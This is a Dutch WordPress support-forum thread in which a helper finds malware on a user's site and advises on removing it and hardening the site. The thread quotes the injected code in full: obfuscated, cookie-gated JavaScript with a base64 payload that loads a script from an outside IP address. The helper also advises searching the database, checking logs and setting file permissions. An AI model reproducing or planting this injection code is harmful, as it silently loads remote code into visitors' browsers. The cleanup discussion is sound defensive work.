Je hebt malware op je site 🙁
Ik heb de broncode opgehaald via een tool en zie de volgende iframe op jou pagina(s):
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
Als ik de base64 string decodeer, en dan the url-encoded karakters weer decodeer, dan zie ik de URL die naar die botcheck site gaat.
Aan jou is nu de taak om te vinden welk bestand/plugin deze code in de pagina’s injecteert.
Ik zou beginnen met de volgende punten:
– Kijk in /wp-content/themes/JOUWTHEMA/functions.php
– Kijk in /wp-content/plugins/ of er een plugin tussen zit die je niet kent
– Kijk in /wp-content/uploads of hier nog rare php bestanden tussen zitten
Hiervoor kun je ftp, ssh of een filemanager gebruiken (indien die beschikbaar is bij je webhost).
dank je
ga op zoek
zit niet in functions of plugins
ga www downloaden en zoeken op string die jij noemt toch?
dank
Rob
gelukt, hartelijk dank johnny!
heb in de database gezocht naar de string en die aangepast
nog een vraagje als het mag:
hoe kwam die malware op de wordpress site? hoe kan ik dat voorkomen?
Waarschijnlijk via een kwetsbaarheid in een van je thema/plugin bestanden.
Weet je ongeveer sinds wanneer dit is gebeurd ? Dan kun je misschien in je webserver access.logs kijken of je daar iets raars ziet. Zoals het opvragen van een URL die SQL queries bevat. Zoek in je logs bijvoorbeeld naar ‘INSERT INTO’, ‘FROM’, ‘WHERE ID’, etc.
Heb je pagina’s waar mensen bestanden kunnen uploaden ? Dat zou ook zoiets mogelijk kunnen maken.
gezocht in de logs maar niks gevonden;
ik ben de enige die uploadt…plugins zijn uptodate
dank, ik wacht maar even af of er nog iets komt
-
Deze reactie is gewijzigd 5 jaren, 10 maanden geleden door wprobbie.
Software is nooit echt waterdicht/bugvrij. Hackers doen er eigenlijk alles aan om een zwakke plek te vinden en deze te misbruiken en kwaadaardige/malware-achtige code te injecteren zgn SQL injection.
* Om je website extra te beveiligen kan je WordFence plugin gebruiken. Heeft wel handige features, in gratis versie.
* Installeer niet te oude plugins en ook niet teveel op je website.
* Update naar de nieuwe versie van plugins en WordPress core en het thema (maak een complete back-up)
* Pas je schrijfrechten aan op de FTP server (om je op weg te helpen):
BESTANDSNAAM
htaccess | Plaats: ../.htaccess | Aanbevolen rechten: 644
wp-config.php | Plaats: ../wp-config.php | Aanbevolen rechten: 644
index.php | Plaats: ../index.php | Aanbevolen rechten: 644
wp-blog-header.php | Plaats: ../wp-blog-header.php | Aanbevolen rechten: 644
MAPNAAM
root of public_html of httpdocs | plaats: ../ | Rechten: 755
wp-admin | plaats: ../wp-admin/ | Rechten: 755
wp-includes | plaats: ../wp-includes/ | Rechten: 755
wp-content | plaats: ../wp-content/ | Rechten: 755
In principe komt het er dus op neer dat de genoemde bestanden de rechten 644 moeten hebben en de genoemde mappen de rechten 755.
Heb je verder nog vragen? Dan vernemen we dit graag!
Vriendelijke groet,
Bas
dank voor je uitgebreide tips
alles is u p to date alleen de core wil niet naar 5.0.3; ik start de update wel vanuit dashboard , dan krijg ik een “500” pagina en dan blijkt ie niet geupdated
geen id hoe dat komt, we hebben nu verzie 498
De foutmelding 500 is een HTTP internal server error. Is een veelvoorkomende foutmelding bij WordPress websites.
Je zult toch even het een en ander uitsluiten waardoor dit komt en dit op te lossen waardoor je deze foutmelding krijgt. Deze website heeft een handige artikel hierover geschreven die je stap-voor-stap kunt doorlopen.
Vriendelijke groet,
Bas